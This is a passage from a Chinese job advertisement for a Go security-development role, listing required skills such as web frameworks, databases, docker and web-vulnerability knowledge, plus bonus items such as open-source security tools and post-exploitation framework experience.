2.熟练使用Gin、Beego、Echo等常用web开发框架、熟悉MySQL、Redis、MongoDB等主流数据库结构的设计,有独立部署调优经验;
3.了解docker,能进行简单的项目部署;
3.熟悉常见web漏洞原理,并能写出对应的利用工具;
4.熟悉TCP/IP协议的基本运作原理;
5.对安全技术与开发技术有浓厚的兴趣及热情,有主观研究和学习的动力,具备正向价值观、良好的团队协作能力和较强的问题解决能力,善于沟通、乐于分享。
【加分项】
1.有高并发tcp服务、分布式、消息队列等相关经验者优先;
2.在github上有开源安全产品优先;
3:有过安全开发经验、独自分析过相关开源安全工具、以及参与开发过相关后渗透框架等优先;
4.在freebuf、安全客、先知等安全平台分享过相关技术文章优先;
5.具备良好的英语文档阅读能力。
简历投递至
END
长按识别二维码关注我们
文章来源: http://mp.weixin.qq.com/s?__biz=MzAwMDQwNTE5MA==&mid=2650246559&idx=1&sn=8199af8aaae30c09ddc43b1c469624b0&chksm=82ea5636b59ddf20f224c23d94c0eb025829c4c57fb0449265e6dbccf66c73ea1a3f2537a3c4#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh